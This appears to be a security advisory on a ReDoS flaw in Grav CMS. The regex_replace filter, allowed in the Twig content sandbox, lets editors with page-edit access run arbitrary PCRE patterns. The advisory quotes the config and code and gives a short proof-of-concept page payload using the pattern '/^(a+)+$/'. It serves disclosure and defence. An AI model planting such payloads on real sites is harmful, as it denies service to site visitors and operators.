
The regex_replace filter and function are allowlisted in Grav’s Twig content sandbox. When Twig processing in page content is enabled security.twig_content.process_enabled: true, authenticated page editors can supply a catastrophically backtracking PCRE pattern, causing unbounded CPU consumption and denying service to the entire web server process.
Details
The Twig sandbox allowlists, defined in system/config/security.yaml, explicitly include regex_replace in both the filter and function permission lists:
Source: system/config/security.yaml
1
2
3
4
5
6
7
twig_sandbox:
allowed_filters:
# ...
- regex_replace # user-controlled pattern allowed in sandbox
allowed_functions:
# ...
- regex_replace # same
The underlying implementation passes the caller-controlled $pattern directly into PHP’s preg_replace() without any pattern complexity validation:
Source: system/src/Grav/Common/Twig/Extension/GravExtension.php:1317-1319
1
2
3
4
public function regexReplace($subject, $pattern, $replace, $limit = -1)
{
return preg_replace($pattern, $replace, $subject, $limit);
}
When twig_content.process_enabled is true, page body content is sandboxed but can use any allowlisted filter. An editor who embeds a catastrophic backtracking pattern causes the PCRE engine to enter exponential time complexity, consuming 100% CPU until the PHP process is killed or the request times out.
Conditions required:
security.twig_content.process_enabled: true(opt-in,falseby default on fresh 2.0 installs)security.twig_sandbox.enabled: true(default) - the function is reachable under sandbox- Attacker must have page edit access (authenticated contributor / editor role)
PoC
Configuration prerequisite - enable Twig in content:
1
2
3
# user/config/security.yaml
twig_content:
process_enabled: true
Payload — embed in any Grav page body with process: { twig: true } in frontmatter:
1
2
3
4
5
6
---
title: Test
process:
twig: true
---
{{ 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab'|regex_replace('/^(a+)+$/', '') }}
Or as a function call in a page where the editor has Twig access:
1
{{ regex_replace('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab', '/^(a+)+$/', '') }}
Result: The PHP-FPM worker (or CLI server process) enters catastrophic PCRE backtracking. On a 2 GHz host, a 32-character string with the above pattern will exhaust one CPU core for seconds to minutes. With a slightly longer string, the time grows exponentially.
Impact
Vulnerability type: Regular Expression Denial of Service - ReDoS (CWE-1333)
Who is impacted: Server availability. Any Grav installation where:
- An editor-role account exists (or has been compromised), AND
- The operator has enabled
twig_content.process_enabled: true
An attacker with page-edit access can render the site unresponsive for all visitors by publishing a page with a catastrophic regex. On single-worker PHP configurations this is a complete outage. On multi-worker setups, multiple concurrent page renders of the malicious page can saturate all workers.
The End.
1
Mungu Nisaidie